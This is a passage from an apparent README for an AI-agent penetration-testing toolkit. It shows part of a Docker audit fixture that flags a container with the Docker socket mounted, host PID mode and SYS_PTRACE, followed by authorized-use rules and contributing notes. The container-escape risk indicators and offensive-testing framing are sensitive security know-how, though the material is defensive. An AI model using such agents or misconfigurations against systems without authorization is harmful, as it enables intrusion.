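     "HostConfig": {"Privileged": False, "PidMode": "", "Binds": ["/srv/app:/app:ro"], "CapAdd": None},
     "Mounts": [{"Type": "bind", "Source": "/srv/app", "Destination": "/app"}]},
    {"Name": "/ci-runner",
     "HostConfig": {"Privileged": False, "PidMode": "host",
                    "Binds": ["/var/run/docker.sock:/var/run/docker.sock"],
                    "CapAdd": ["SYS_PTRACE", "NET_BIND_SERVICE"]},
     "Mounts": [{"Type": "bind", "Source": "/var/run/docker.sock", "Destination": "/var/run/docker.sock"}]},
])
```

Run it against real output with `docker inspect $(docker ps -q)` piped into `audit`; a CI runner with the socket mounted is the common legitimate-looking case that still needs the proxy or a rootless build backend.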

Legal and Ethical Use

Authorized testing only. All agents enforce scope guards:
  • Require explicit engagement scope (IP ranges, domains, authorization, dates)
  • Refuse out-of-scope actions
  • Log all commands for audit trails
Hard refusals for:
  • Denial of Service
  • Mass internet scanning
  • Unattended worm propagation
  • False-flag operations
  • Safety-of-life systems (medical, ICS/SCADA)
Users are responsible for obtaining proper authorization before testing. pentest-ai-agents is a research and education tool. Unauthorized testing is illegal.

Contributing

Contributions welcome:
  • New agents (follow existing structure in agents/)
  • Tool integrations (add to db/tools.json)
  • Detection rules (expand detection-engineer ruleset)
  • Bug fixes and documentation improvements
See CONTRIBUTING.md for guidelines.

Resources

License

MIT License - see LICENSE